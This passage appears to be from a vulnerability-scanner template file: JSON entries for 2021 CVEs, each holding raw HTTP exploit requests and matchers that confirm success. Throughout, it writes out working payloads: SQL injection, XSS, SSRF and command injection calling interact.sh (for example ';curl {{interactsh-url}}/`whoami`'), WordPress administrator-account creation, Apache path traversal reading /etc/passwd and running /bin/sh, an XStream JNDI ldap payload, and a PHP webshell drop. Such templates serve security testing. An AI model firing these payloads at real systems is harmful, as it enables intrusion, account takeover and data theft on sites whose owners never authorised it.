value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2021-27905","info":{"name":"Apache Solr <=8.8.1 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n","GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n"],"matchers":[{"type":"word","part":"body","words":["OK"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2021-37216","info":{"name":"QSAN Storage Manager <3.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/http_header.php"],"headers":{"X-Trigger-XSS":""},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(header), 'x-xss-protection')"]},{"type":"word","part":"body","words":["\"HTTP_X_TRIGGER_XSS\":\"\""]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2021-34621","info":{"name":"WordPress ProfilePress  3.0.0-3.1.3 - Admin User Creation Weakness","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_username\"\n\n{{randstr}}\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_email\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_password\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_password_present\"\n\ntrue\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_first_name\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_last_name\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"_wp_http_referer\"\n\n/wp/?page_id=18\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"pp_current_url\"\n\n{{BaseURL}}\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"wp_capabilities[administrator]\"\n\n1\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"signup_form_id\"\n\n1\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"signup_referrer_page\"\n\n\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"action\"\n\npp_ajax_signup\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"melange_id\"\n\n\n-----------------------------138742543134772812001999326589--\n","POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\nlog={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In\n","GET /wp-admin/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome to your WordPress Dashboard"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42192","info":{"name":"KONGA 0.14.9 - Privilege Escalation","severity":"high"},"requests":[{"raw":["POST /login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"password\": \"{{password}}\", \"identifier\": \"{{username}}\"}\n","POST /api/user/{{id}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/json;charset=utf-8\n\n{\"token\": \"{{token}}\"}\n","PUT /api/user/{{id}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/json;charset=utf-8\n\n{\"admin\": \"true\", \"passports\": {\"password\": \"{{password}}\", \"protocol\": \"local\"}, \"token\": \"{{token}}\", \"password_confirmation\": \"{{password}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_2, \"\\\"admin\\\":false\")","contains(body_3, \"\\\"admin\\\":true\")"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["\"id\":([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"token","group":1,"regex":["\"token\":\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-25899","info":{"name":"Void Aural Rec Monitor 9.0.0.1 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /AurallRECMonitor/services/svc-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nparam1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))dummy)--+dummy¶m2=test\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Contacte con el administrador\")"],"condition":"and"}]}]},{"id":"CVE-2021-21287","info":{"name":"MinIO Browser API - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /minio/webrpc HTTP/1.1\nHost: {{interactsh-url}}\nContent-Type: application/json\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36\nContent-Length: 76\n\n{\"id\":1,\"jsonrpc\":\"2.0\",\"params\":{\"token\":  \"Test\"},\"method\":\"web.LoginSTS\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["We encountered an internal error"]}]}]},{"id":"CVE-2021-38751","info":{"name":"ExponentCMS <= 2.6 - Host Header Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Host":"{{randstr}}.tld"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{randstr}}.tld","EXPONENT.PATH","EXPONENT.URL"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25065","info":{"name":"Smash Balloon Social Post Feed < 4.1.1 - Authenticated Reflected Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=cff-top&cff_access_token=xox%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert(document.domain)%3E&cff_final_response=true HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"\")","contains(body_2, \"custom-facebook-feed\")"],"condition":"and"}]}]},{"id":"CVE-2021-25003","info":{"name":"WordPress WPCargo Track & Trace <6.9.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n2={{md5(num)}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 != 200","status_code_2 == 200","status_code_3 == 200","contains(body_3, md5(num))","contains(body_3, 'PNG')"],"condition":"and"}]}]},{"id":"CVE-2021-24342","info":{"name":"WordPress JNews Theme <8.0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/themes/jnews/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Change Log:","JNews -"],"condition":"and"}]},{"raw":["POST /?ajax-request=jnews HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nlang=en_US&cat_id=6\">&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["Content-Type: text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37305","info":{"name":"Jeecg Boot <= 2.4.5 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jeecg-boot/sys/user/querySysUser?username=admin"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username\":\"admin","success\":true","result\":{"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43574","info":{"name":"Atmail 6.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\" does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500,403],"condition":"or"}]}]},{"id":"CVE-2021-40542","info":{"name":"Opensis-Classic 8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33357","info":{"name":"RaspAP <=2.6.5 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["DHCPEnabled"]}],"extractors":[{"type":"regex","group":1,"regex":["GET \\/([a-z-]+) HTTP"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-24285","info":{"name":"WordPress Car Seller - Auto Classifieds Script - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24288","info":{"name":"WordPress AcyMailing <7.5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-24275","info":{"name":"Popup by Supsystic <1.10.5 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":[""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25033","info":{"name":"Noptin < 1.6.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-26702","info":{"name":"EPrints 3.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24943","info":{"name":"Registrations for the Events Calendar < 2.7.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php?action=rtec_send_unregister_link HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nevent_id=3 AND (SELECT 1874 FROM (SELECT(SLEEP(5)))vNpy)&email={{text}}@{{text}}.com\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(body, \"Please enter the email you registered with\")"],"condition":"and"}]}]},{"id":"CVE-2021-27850","info":{"name":"Apache Tapestry - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /assets/app/something/services/AppModule.class/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/java"]},{"type":"word","part":"body","words":["configuration","webtools"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["\\/assets\\/app\\/([a-z0-9]+)\\/services\\/AppMod"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-33904","info":{"name":"Accela Civic Platform <=21.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["\"k3woq\"^confirm(document.domain)^\"a2pbrnzx5a9\"","servProvCode"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45967","info":{"name":"Pascom CPS Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40272","info":{"name":"IRTS OP5 Monitor - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /api/help'onmouseover=alert(document.domain)/'/;/beta/license HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body, \"help\\'onmouseover=alert(document.domain)/\\'/;/beta/license?format=json\\'>JSON\")","contains_any(tolower(body), \"op5 monitor\", \"itrs\")","contains(content_type, \"text/html\")","status_code == 401"],"condition":"and"}]}]},{"id":"CVE-2021-24210","info":{"name":"WordPress PhastPress <1.111 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-39141","info":{"name":"XStream 1.4.18  - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n\n  \n  \n    \n      2\n    \n    3\n    \n      java.lang.Comparable\n      \n        \n        false\n        \n          \n            \n              \n                java.lang.Comparable\n                compareTo\n                \n                  java.lang.Object\n                \n              \n              \n                \n                  \n                    0\n                  \n                  \n                    PLAIN\n                  \n                  \n                    \n                      false\n                      \n                        int\n                        \n                          hash\n                          java.lang.String\n                        \n                      \n                      false\n                      \n                        \n                        hash\n                        \n                      \n                      \n                        java.lang.String\n                        \n                          javax.naming.InitialContext\n                          doLookup\n                          \n                            java.lang.String\n                          \n                        \n                      \n                      \n                        \n                          \n                            serialPersistentFields\n                            \n                              [Ljava.io.ObjectStreamField;\n                              \n                                serialPersistentFields\n                                java.lang.String\n                              \n                            \n                          \n                          \n                            CASE_INSENSITIVE_ORDER\n                            \n                              java.util.Comparator\n                              \n                                CASE_INSENSITIVE_ORDER\n                                java.lang.String\n                              \n                            \n                          \n                          \n                            serialVersionUID\n                            \n                              long\n                              \n                                serialVersionUID\n                                java.lang.String\n                              \n                            \n                          \n                          \n                            value\n                            \n                              [C\n                              \n                                value\n                                java.lang.String\n                              \n                            \n                          \n                          \n                            hash\n                            \n                              int\n                              \n                            \n                          \n                        \n                        \n                          \n                            serialPersistentFields\n                            \n                              [Ljava.io.ObjectStreamField;\n                              \n                            \n                          \n                          \n                            CASE_INSENSITIVE_ORDER\n                            \n                              java.util.Comparator\n                              \n                            \n                          \n                          \n                            serialVersionUID\n                            \n                              long\n                              \n                            \n                          \n                          \n                            value\n                            \n                              [C\n                              \n                            \n                          \n                          \n                            hash\n                            \n                          \n                        \n                        false\n                        java.lang.String\n                        \n                      \n                    \n                  \n                  java.lang.Object\n                  \n                  false\n                \n                false\n              \n            \n          \n          false\n        \n        \n          \n            \n            \n              \n              \n              false\n              false\n            \n          \n        \n      \n    \n    ldap://{{interactsh-url}}/#evil\n  \n\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-24498","info":{"name":"WordPress Calendar Event Multi View <1.4.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><","Calendar Details"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24666","info":{"name":"WordPress Podlove Podcast Publisher <3.5.6 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["66a82937a7660b73b00d4f7cefee6c85","\"service_id\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42013","info":{"name":"Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\necho Content-Type: text/plain; echo; {{cmd}}\n\n"],"stop-at-first-match":true,"unsafe":true,"matchers-condition":"or","matchers":[{"type":"word","name":"RCE","words":["CVE-2021-42013"]},{"type":"regex","name":"LFI","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-28937","info":{"name":"Acexy Wireless-N WiFi Repeater REV 1.0 - Repeater Password Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/password.html"],"matchers-condition":"and","matchers":[{"type":"word","words":["Password Setting","addCfg('username'","addCfg('newpass'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35265","info":{"name":"MaxSite CMS > V106 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E","{{BaseURL}}/page/1%22%3E%3Csvg/onload=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[">"]},{"type":"word","part":"body","words":["mso-comments-rss\">RSS","MaxSite CMS","feed\">RSS"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37589","info":{"name":"Virtua Software Cobranca <12R - Blind SQL Injection","severity":"high"},"requests":[{"raw":["POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n","POST /controller/login.php?acao=autenticar HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nidusuario='&idsenha=test&tipousr=Usuario\n","POST /controller/login.php?acao=autenticar HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nidusuario=''&idsenha=a&tipousr=Usuario\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3, \"Os parametros n\u00e3o est\u00e3o informados corretamente\")","contains(body_3, \"O CNPJ dos parametro n\u00e3o est\u00e1 informado corretamente\")"],"condition":"or"},{"type":"dsl","dsl":["status_code_2 == 500 && status_code_3 == 200"]}]}]},{"id":"CVE-2021-3378","info":{"name":"FortiLogger 4.4.2.2 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: application/json\nReferer: {{BaseURL}}\nConnection: close\nX-Requested-With: XMLHttpRequest\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"file\"; filename=\"poc.txt\"\nContent-Type: image/png\n\n{{randstr}}\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\n","GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{randstr}}"]},{"type":"word","part":"header","words":["text/plain","ASP.NET"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44077","info":{"name":"Zoho ManageEngine ServiceDesk Plus - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/RestAPI/ImportTechnicians"],"matchers-condition":"and","matchers":[{"type":"word","words":["
    "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"facebook_urls\":[[\"\"]]"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24910","info":{"name":"WordPress Transposh Translation <1.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&tl=en&q="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","{\"result\":"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24495","info":{"name":"Wordpress Marmoset Viewer <1.9.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://","{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","alert(/{{randstr}}/)"],"condition":"or"},{"type":"word","words":["Marmoset Viewer"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41951","info":{"name":"Resourcespace - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["TEST"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43725","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?data[performredirect]=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&page=login"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\">","name=\"data[performredirect]"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-1497","info":{"name":"Cisco HyperFlex HX Data Platform - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /auth/change HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password={{url_encode(payload)}}\n","POST /auth HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password={{url_encode(payload)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-46072","info":{"name":"Vehicle Service Management System 1.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_service HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&service=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&description=%3cp%3e%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e%3cbr%3e%3c%2fp%3e&status=1\n","GET /admin/?page=maintenance/services HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"\\\">\")"],"condition":"and"}]}]},{"id":"CVE-2021-25112","info":{"name":"WordPress WHMCS Bridge <6.4b - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25078","info":{"name":"Affiliates Manager < 2.9.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /?wpam_id=1 HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-For: \n","GET /wp-admin/admin.php?page=wpam-clicktracking HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200 && status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, 